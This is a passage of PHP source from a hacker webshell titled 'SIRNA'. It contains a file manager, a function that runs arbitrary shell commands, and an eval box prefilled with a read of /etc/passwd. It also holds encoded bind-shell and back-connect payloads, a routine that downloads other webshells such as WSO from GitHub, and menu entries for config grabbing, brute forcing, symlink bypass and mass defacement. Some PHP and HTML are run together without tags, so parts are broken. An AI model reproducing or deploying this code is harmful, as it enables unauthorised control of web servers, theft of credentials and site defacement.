  414. <input type=\"hidden\" name=\"oldname\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" />
  415. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $folder . "\" />
  416. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  417. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($folder) . "_form','" . clearspace($folder) . "_link');\" />
  418. </form> </td><td>DIR</td><td style=\"text-align:center;\">" . $owner . "</td><td><center>
  419. <a href=\"javascript:tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form3');\">" . get_perms($pwd . $folder) . "</a>
  420. <form action=\"?sad=$pwd\" method=\"post\" id=\"" . clearspace($folder) . "_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  421. <input type=\"hidden\" name=\"name\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" />
  422. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"" . substr(sprintf('%o', fileperms($pwd . $folder)), -4) . "\" />
  423. <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  424. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  425. onclick=\"tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form3');\" /></form></center></td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($folder)) . "</td><td><a href=\"javascript:tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form');\">rename</a>| <a href=\"?sad=$pwd&amp;fdelete=" . $pwd . $folder . "\">delete</a>
  426. </td>
  427. </tr>";
  428.         }
  429.     }
  430.     foreach ($fname as $file) {
  431.         $full = $pwd . $file;
  432.         if (!$win && $posix) {
  433.             $name  = @posix_getpwuid(@fileowner($file));
  434.             $group = @posix_getgrgid(@filegroup($file));
  435.             $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
  436.         } else {
  437.             $owner = $user;
  438.         }
  439.         $buff .= "<tr><td><a id=\"" . clearspace($file) . "_link\" href=\"?sad=$pwd&amp;view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' />  $file</a>
  440. <form action=\"?sad=$pwd\" method=\"post\" id=\"" . clearspace($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  441. <input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" />
  442. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $file . "\" />
  443. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  444. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\" />
  445. </form></td><td>" . ukuran($full) . "</td><td style=\"text-align:center;\">" . $owner . "</td><td><center>
  446. <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form2');\">" . get_perms($full) . "</a>
  447. <form action=\"?sad=$pwd\" method=\"post\" id=\"" . clearspace($file) . "_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  448. <input type=\"hidden\" name=\"name\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" />
  449. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"" . substr(sprintf('%o', fileperms($full)), -4) . "\" />
  450. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  451. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form2');\" /></form></center></td>
  452. <td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($full)) . "</td>
  453. <td><a href=\"?sad=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\">rename</a>| <a href=\"?sad=$pwd&amp;delete=$full\">delete</a> | <a href=\"?sad=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?sad=$pwd&amp;dlgzip=$full\">gz</a>)
  454. </td></tr>";
  455.     }
  456.     $buff .= "<center><tr style='background-color:teal;'><td colspan='6'><center>Kau Buat Sirna Sudahlah.. Harapanku Hidup Bersamamu..</center></td></table>";
  457.     return $buff;
  458. }
  459. function ukuran($file)
  460. {
  461.     if ($size = @filesize($file)) {
  462.         if ($size <= 1024)
  463.             return $size;
  464.         else {
  465.             if ($size <= 1024 * 1024) {
  466.                 $size = @round($size / 1024, 2);
  467.                 ;
  468.                 return "$size kb";
  469.             } else {
  470.                 $size = @round($size / 1024 / 1024, 2);
  471.                 return "$size mb";
  472.             }
  473.         }
  474.     } else
  475.         return "???";
  476. }
  477. function exe($cmd)
  478. {
  479.     if (function_exists('system')) {
  480.         @ob_start();
  481.         @system($cmd);
  482.         $buff = @ob_get_contents();
  483.         $buff = @ob_get_contents();
  484.         @
  485.         return $buff;
  486.     } elseif (function_exists('exec')) {
  487.         @exec($cmd, $results);
  488.         $buff = "";
  489.         foreach ($results as $result) {
  490.             $buff .= $result;
  491.         }
  492.         return $buff;
  493.     } elseif (function_exists('passthru')) {
  494.         @ob_start();
  495.         @passthru($cmd);
  496.         $buff = @ob_get_contents();
  497.         @
  498.         return $buff;
  499.     } elseif (function_exists('shell_exec')) {
  500.         $buff = @shell_exec($cmd);
  501.         return $buff;
  502.     }
  503. }
  504. function tulis($file, $text)
  505. {
  506.     $textz = gzinflate(base64_decode($text));
  507.     if ($filez = @fopen($file, "w")) {
  508.         @fputs($filez, $textz);
  509.         @fclose($file);
  510.     }
  511. }
  512. function ambil($link, $file)
  513. {
  514.     if ($fp = @fopen($link, "r")) {
  515.         while (!feof($fp)) {
  516.             $cont .= @fread($fp, 1024);
  517.         }
  518.         @fclose($fp);
  519.         $fp2 = @fopen($file, "w");
  520.         @fwrite($fp2, $cont);
  521.         @fclose($fp2);
  522.     }
  523. }
  524. function which($pr)
  525. {
  526.     $path = exe("which $pr");
  527.     if (!empty($path)) {
  528.         return trim($path);
  529.     } else {
  530.         return trim($pr);
  531.     }
  532. }
  533. function download($cmd, $url)
  534. {
  535.     $namafile = basename($url);
  536.     switch ($cmd) {
  537.         case 'wwget':
  538.             exe(which('wget') . " " . $url . " -O " . $namafile);
  539.             break;
  540.         case 'wlynx':
  541.             exe(which('lynx') . " -source " . $url . " > " . $namafile);
  542.             break;
  543.         case 'wfread':
  544.             ambil($wurl, $namafile);
  545.             break;
  546.         case 'wfetch':
  547.             exe(which('fetch') . " -o " . $namafile . " -p " . $url);
  548.             break;
  549.         case 'wlinks':
  550.             exe(which('links') . " -source " . $url . " > " . $namafile);
  551.             break;
  552.         case 'wget':
  553.             exe(which('GET') . " " . $url . " > " . $namafile);
  554.             break;
  555.         case 'wcurl':
  556.             exe(which('curl') . " " . $url . " -o " . $namafile);
  557.             break;
  558.         default:
  559.             break;
  560.     }
  561.     return $namafile;
  562. }
  563. function get_perms($file)
  564. {
  565.     if ($mode = @fileperms($file)) {
  566.         $perms = '';
  567.         $perms .= ($mode & 00400) ? 'r' : '-';
  568.         $perms .= ($mode & 00200) ? 'w' : '-';
  569.         $perms .= ($mode & 00100) ? 'x' : '-';
  570.         $perms .= ($mode & 00040) ? 'r' : '-';
  571.         $perms .= ($mode & 00020) ? 'w' : '-';
  572.         $perms .= ($mode & 00010) ? 'x' : '-';
  573.         $perms .= ($mode & 00004) ? 'r' : '-';
  574.         $perms .= ($mode & 00002) ? 'w' : '-';
  575.         $perms .= ($mode & 00001) ? 'x' : '-';
  576.         return $perms;
  577.     } else
  578.         return "??????????";
  579. }
  580. function clearspace($text)
  581. {
  582.     return str_replace(" ", "_", $text);
  583. }
  584. $tunisia         = '';
  585. $port_bind_bd_c  = "bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  586. $port_bind_bd_pl = "ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  587. $back_connect    = "fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  588. $back_connect_c  = "XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";<html><head><link rel="icon" type="image/png" href="http://downloadicons.net/sites/default/files/heartbreak-icon-85786.png"><title>S I R N A</title>
  589. <script type="text/javascript">function tukar(b,a){document.getElementById(b).style.display="none";document.getElementById(a).style.display="block"};</script>
  590. <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet">
  591. <style>body::-webkit-scrollbar{width:1em}body::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3)}body::-webkit-scrollbar-thumb{background-color:darkgrey;outline:1px solid slategrey}.mybox{-moz-border-radius:10px;border-radius:10px;border:1px solid #4c83af;padding:4px 2px;width:70%;line-height:24px}.myboxtbl{width:50%}body{background-color:transparan;background:#000;background-image:url("echo $background;");background-position:center;background-attachment:fixed;background-repeat:no-repeat}a{text-decoration:none}hr,a:hover{border-bottom:1px solid #4c83af}*{text-shadow:0 0 .3em #999;font-size:14px;font-family:'Montserrat',sans-serif;color:echo $fontcolor_global;}.tabnet{margin:15px auto 0 auto;border:1px solid #333}.main{width:100%}.gaya{color:#888}.top{border-left:1px solid black;border-RIGHT:1px solid #fff;font-family:verdana}input{background:#111;border:1;padding:2px;border-bottom:1px solid #222;border-top:1px solid #222;font-size:12px;vertical-align:middle;height:20;border-left:1px solid #5d5d5d;border-right:1px solid #121212;border-bottom:1px solid #121212;border-top:1px solid #5d5d5d;color:#9f9f9f}.inputz{background:#111;border:0;padding:2px;border-bottom:1px solid #393939;font-size:11px;color:#fff;-moz-border-radius:6px;border-radius:10px;border:1px solid #4c83af;margin:4px 0 8px 0}.inputzbut{background:#111;color:#8f8f8f;margin:0 4px;border:1px solid #444}.inputzbut:hover{border-bottom:1px solid #4c83af;border-top:1px solid #4c83af}.inputz:hover{-moz-border-radius:6px;border-radius:10px;border:1px solid #4c83af;margin:4px 0 8px 0;border-bottom:1px solid #4c83af;border-top:1px solid #4c83af}.output2{margin:auto;border:1px solid #888;background:#000;padding:0 2px}textarea{margin:auto;border:2px solid #555;background:#000;padding:0 2px}.output{margin:auto;border:1px solid #303030;width:100%;height:400px;background:#000;padding:0 2px}.cmdbox{width:100%}.head_info{padding:0 4px}.b1{font-size:30px;padding:0;color:#555}.b2{font-size:30px;padding:0;color:maroon}.b_tbl{text-align:center;margin:0 4px 0 0;padding:0 4px 0 0;border-right:1px solid #333}.phpinfo table{width:100%;padding:0}.phpinfo td{background:#111;color:#ccc;padding:6px 8px}.phpinfo th,th{background:teal;border-bottom:1px solid #333;font-weight:400}.phpinfo h2,.phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222;padding:4px 0}.explore{width:100%}.explore a{text-decoration:none}.explore td{border-bottom:1px solid #333;padding:0 8px;line-height:24px;color:#999}.explore th{padding:3px 8px;font-weight:400;color:white}.explore th:hover,.phpinfo th:hover{border-bottom:1px solid red}.explore tr:hover{background:#333}.viewfile{background:#edeceb;color:#000;margin:4px 2px;padding:8px}.sembunyi{display:none;padding:0;margin:0}#menu{background:#111;font-family:'Montserrat',sans-serif;font-size:12px;color:silver}#menu a{font-family:'Montserrat',sans-serif;padding:3px 5px;margin:2;text-shadow:0 0 .1em rgba(0,128,128,1),0pt 0 .3em rgba(0,128,128,1);background:#2d2b2b;text-decoration:none;letter-spacing:2px;display:inline-block;-moz-border-radius:10px;-webkit-border-radius:5px;-khtml-border-radius:5px;border-radius:5px}#menu a:hover{font-family:'Montserrat',sans-serif;background:#191919;border-bottom:1px solid #444;border-top:1px solid #444;color:#cecece}li{display:inline-block}ul{list-style-type:none;margin:0;margin:0}k,k a,k a:hover{text-shadow:0 0 .3em red;font-family:'Montserrat',sans-serif;font-size:25px;color:#fff}h7{font-size:35px}</style><body onLoad="document.getElementById('cmd').focus()"><div class="main"><div class="head_info"> <table><tr><td width="15%"><table class="b_tbl" cellspacing="0">
  592. echo '<center><img src="http://cdn2.tstatic.net/tribunnews/foto/bank/images/20140203_070700_ilustrasi-galau.jpg" width="150px"><br><b>'.(base64_decode('UyBJIFIgTiBB==').'</b>');<div id="menu"><a href="?echo "sad=" . $pwd;&amp;x=about">About Me</a></div></center>
  593. </td></tr></table></td><td class="top" width='80%' valign="top">echo $buff;</td><td style="width:30%" valign="top"><a>server ip :echo $server_ip . "<font color='red'><br><br></font> your ip : " . $my_ip . "<br></a>";</td></tr></table></div>
  594. <div id="menu">
  595. <center>
  596. <ul>
  597. <li><a href="?"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII='></a></li>
  598. <li><a href="?echo "sad=" . $pwd;">Files</a></li>
  599. <li><a href="?echo "sad=" . $pwd;&amp;x=shell">Command</a></li>
  600. <li><a href="?echo "sad=" . $pwd;&amp;x=upload">Upload</a></li>
  601. <li><a href="?echo "sad=" . $pwd;&amp;x=php">Eval</a></li>
  602. <li><a href="?echo "sad=" . $pwd;&amp;x=sym">Sym</a></li>
  603. <li><a href="?echo "sad=" . $pwd;&amp;x=jumping">Jumping</a></li>
  604. <li><a href="?echo "sad=" . $pwd;&amp;x=hostg">Fucking HostGator</a></li>
  605. <li><a href="?echo "sad=" . $pwd;&amp;x=grabc">Config Grabber</a></li>
  606. <li><a href="?echo "sad=" . $pwd;&amp;x=netsploit">Tools</a></li>
  607. <li><a href="?echo "sad=" . $pwd;&amp;x=mass">Mass</a></li>
  608. <li><a href="?echo "sad=" . $pwd;&amp;x=krdp">Create RDP</a></li>
  609. <li><a href="?echo "sad=" . $pwd;&amp;x=mailtest">Mail Tester</a></li>
  610. <li><a href="?echo "sad=" . $pwd;&amp;x=get_tools">Write Tools</a></li>
  611. <li><a href="?echo "sad=" . $pwd;&amp;x=bypasser">Bypasser</a></li>
  612. <li><a href="?echo "sad=" . $pwd;&amp;x=brute">Brute</a></li>
  613. <li><a href="?echo "sad=" . $pwd;&amp;x=phpinfo">phpinfo</a></li>
  614. <li><a href="?echo "sad=" . $pwd;&amp;x=zone-h">Zone-H</a></li>
  615. <li><a href="?echo "sad=" . $pwd;&amp;x=joomla">Joomla</a></li>
  616. <li><a href="?echo "sad=" . $pwd;&amp;x=wordpress">Wordpress</a></li>
  617. <li><a href="?echo "sad=" . $pwd;&amp;x=vb">Vb</a></li>
  618. <li><a href="?echo "sad=" . $pwd;&amp;x=domains">Domains</a></li>
  619. <li><a href="?echo "sad=" . $pwd;&amp;x=string">String</a></li>
  620. <li><a href="?echo "sad=" . $pwd;&amp;x=cmsdet">CMS Detector</a></li>
  621. <li><a href="?echo "sad=" . $pwd;&amp;x=wm">Wp Mass</a></li>
  622. <li><a href="?echo "sad=" . $pwd;&amp;x=settings">Settings</a></li>
  623. <li><a href="?echo "sad=" . $pwd;&amp;x=change_pass">Change Shell Password</a></li>
  624. <li><a href="?logout" style="background:#900;color:#FFF;background-image:url('http://up.ashiyane.org/images/b5crr7rhrwc5e97nvgxq.png');background-position:2px;height:20px;width:100px;background-repeat:no-repeat">Logout</a></li>
  625. </ul>
  626. </center>
  627. </div>
  628. if (isset($_GET['x']) && ($_GET['x'] == 'php')) {<form action="?sad=echo $pwd;&amp;x=php" method="post"><table class="cmdbox"><tr><td><textarea class="output" name="cmd" id="cmd" cols=90>
  629. if (isset($_POST['submitcmd'])) {
  630.         echo eval(magicboom($_POST['cmd']));
  631.     } else
  632.         echo "echo file_get_contents('/etc/passwd');";</textarea></td></tr><tr><td><input style="width:19%" class="inputzbut" type="submit" value="Do !" name="submitcmd" /></td></tr></form></table></form>
  633. }
  634. elseif (isset($_GET['logout'])) {
  635. session_unset($_SESSION["login"]);
  636. echo '<meta http-equiv="Refresh" content="0; URL='.$_SERVER['PHP_SELF'].'"/>';
  637. }
  638. elseif (isset($_GET['x']) && ($_GET['x'] == 'change_pass')) {
  639. <center>
  640. <h1>Change Shell Password</h1>
  641. <form action="?sad=echo $pwd;&amp;x=change_pass" method="post">
  642. <input type="text" name="password" class="inputz"><br>
  643. <input type="submit" name="submit" class="inputzbut">
  644. </form>
  645. if(isset($_POST['submit'])){
  646.     $newpassword = md5($_POST['password']);
  647.     $old_pass = '"'.$auth_pass.'";';
  648.     $new_pass = '"'.$newpassword.'";';
  649.     if(file_get_contents($_SERVER['SCRIPT_FILENAME'])){
  650.         $kr_pass = file_get_contents($_SERVER['SCRIPT_FILENAME']);
  651.         $kr_pass = preg_replace("/$old_pass/is",$new_pass,$kr_pass);
  652.     if(file_put_contents($_SERVER['SCRIPT_FILENAME'], $kr_pass)){
  653.         echo "password baru : <font color=red>".$_POST['password']."</font> - <font color=greenyellow>$newpassword</font>";
  654.     }
  655.     }else{
  656.         echo "Password gagal";
  657.     }
  658. }
  659.    
  660. }
  661. elseif(isset($_GET['x']) && ($_GET['x'] == 'mailtest'))
  662.     {
  663.         $to      = 'htaccess12@gmail.com';
  664.         $subject = 'Support Mailer ^_^';
  665.         $message = 'Support Mailer ! ^_^';
  666.         $headers = 'From: webmaster@example.com\r\nReply-To: webmaster@example.com\r\nX-Mailer: PHP/' . phpversion();
  667.  
  668.         mail($to, $subject, $message, $headers);
  669.         if(mail($to, $subject, $message, $headers)){
  670.             echo '<script>alert("Support Mailer !!! Cek Emailmu !")</script>';
  671.         }else{
  672.             echo '<script>alert("Ada Kesalahan ! ")</script>';
  673.         }
  674.        
  675.     }
  676. elseif(isset($_GET['x']) && ($_GET['x'] == 'settings'))
  677.     {
  678. <center><br>
  679. <h7>Settings Shell</h7><br>
  680. <a href="?echo "y=".$pwd;&amp;x=set_bg"><input class=inputzbut type=submit value=" Background Shell" /></a>
  681. | <a href="?echo "y=".$pwd;&amp;x=set_login"><input class=inputzbut type=submit value=" Login Background" /></a><br>
  682. </center>
  683. //functions settings
  684.         $bgshell    = $_POST['bg_shell'];
  685.         $bg_login   = $_POST['bg_login'];
  686.  
  687.        if(isset($_POST['submit'])){
  688.  
  689.         if (!empty($bgshell)) {
  690.             $bgshelll = $_POST['bg_shell'];
  691.             $replace_new = ''.$bgshelll.'';
  692.             if(file_get_contents($_SERVER['SCRIPT_FILENAME'])){
  693.                 $write = file_get_contents($_SERVER['SCRIPT_FILENAME']);
  694.                 $background = preg_quote($background, '/');
  695.                 var_dump($background);
  696.                
  697.                 $write = preg_replace("/$background/",$replace_new,$write);
  698.             if(file_put_contents($_SERVER['SCRIPT_FILENAME'], $write)){
  699.                 echo '<center>Setting Saved !</center>';
  700.             }
  701.             }else{
  702.                 echo "<center>Setting Not Saved</center>";
  703.             }
  704.         }elseif(!empty($bg_login)){
  705.             $bglogin = $_POST['bg_login'];
  706.             $replace_new = ''.$bglogin.'';
  707.             if(file_get_contents($_SERVER['SCRIPT_FILENAME'])){
  708.                 $write = file_get_contents($_SERVER['SCRIPT_FILENAME']);
  709.                 $background_login = preg_quote($background_login, '/');
  710.                 $write = preg_replace("/$background_login/",$replace_new,$write);
  711.             if(file_put_contents($_SERVER['SCRIPT_FILENAME'], $write)){
  712.                 echo '<center>Setting Saved !</center>';
  713.             }
  714.             }else{
  715.                 echo "<center>Setting Not Saved !</center>";
  716.             }
  717.         }
  718.     }
  719.  
  720.    
  721.     }
  722.     elseif(isset($_GET['x']) && ($_GET['x'] == 'get_tools'))
  723.     {<center><br><br><h3>Write Tools</h3>
  724. <table>
  725. <tr><form method="post" action="">&nbsp;<td>
  726. <select class="inputz" align="left" name="pilihan" id="pilih">
  727. <option value="hsphere">Bypass hSphere Shell</option>
  728. <option value="adminer">Adminer</option>
  729. <option value="miniadmin">PHPMiniAdmin</option>
  730. <option value="wso">WSO Shell</option>
  731. </select>
  732. <input type="submit" name="submites" class="inputz" value="create">
  733. </td></form></tr></table><br/><br/><br/>
  734. function gettool($filename,$link){
  735.               $get = file_get_contents($link);
  736.               file_put_contents($filename.'.php', $get);
  737.               echo '<script>alert("Done ! ");</script>';
  738.               echo 'Berhasil =>  <a href="'.$filename.'.php" target="_blank">'.$filename.'.php</a>';
  739.             }
  740.                 $submit = $_POST ['submites'];
  741.                 if(isset($submit)) {
  742.                     $pilih = $_POST['pilihan'];
  743.                     ///hsphere shell
  744.                         if ( $pilih == 'hsphere') {
  745.                             gettool("hsphere","https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php");
  746.                         }
  747.                         elseif ( $pilih == 'adminer') {
  748.                             gettool("adminer","https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php");
  749.                         }elseif($pilih == 'miniadmin'){
  750.                             gettool("sqlminiadmin","https://pastebin.com/raw/iHSNkKmg");
  751.                         }elseif( $pilih == 'wso'){
  752.                             gettool("wso","https://raw.githubusercontent.com/tennc/webshell/master/php/wso/WSO_base64.php");
  753.                         }
  754.                     }
  755.        
  756.     }
  757.     elseif(isset($_GET['x']) && ($_GET['x'] == 'set_bg'))
  758.     {
  759. <center>
  760. <form action="?sad=echo $pwd;&amp;x=settings" method="POST">
  761. <table>
  762. <tr>
  763. <td><h7>Appearance Setting</h7></td>
  764. </tr>
  765. <tr>
  766. <td>Background Shell</td><td>:</td><td><input type="text" name="bg_shell" class="inputz" placeholder="link image" style="width:200px"></td>
  767. </tr>
  768. <tr>
  769. <td></td><td></td><td><input type="submit" name="submit" class="inputzbut"></td>
  770. </tr>
  771. </form>
  772. </table>
  773.  
  774.     }
  775.  
  776.     elseif(isset($_GET['x']) && ($_GET['x'] == 'set_login'))
  777.     {
  778. <center>
  779. <form action="?sad=echo $pwd;&amp;x=settings" method="POST">
  780. <table>
  781. <tr>
  782. <td><h7>Appearance Setting</h7></td>
  783. </tr>
  784. <tr>
  785. <td>Login Background</td><td>:</td><td><input type="text" name="bg_login" class="inputz" placeholder="link image" style="width:200px"></td>
  786. </tr>
  787. <tr>
  788. <td></td><td></td><td><input type="submit" name="submit" class="inputzbut" value="submit setting"></td>
  789. </tr>
  790. </form>
  791. </table>
  792.  
  793.     }
  794.     elseif(isset($_GET['x']) && ($_GET['x'] == 'bypasser'))
  795.             {
  796.                 echo "<center><br/><br/>Choose Bypasser Below<br/><br/>";
  797. <a href="?echo "path=".$path;&amp;x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
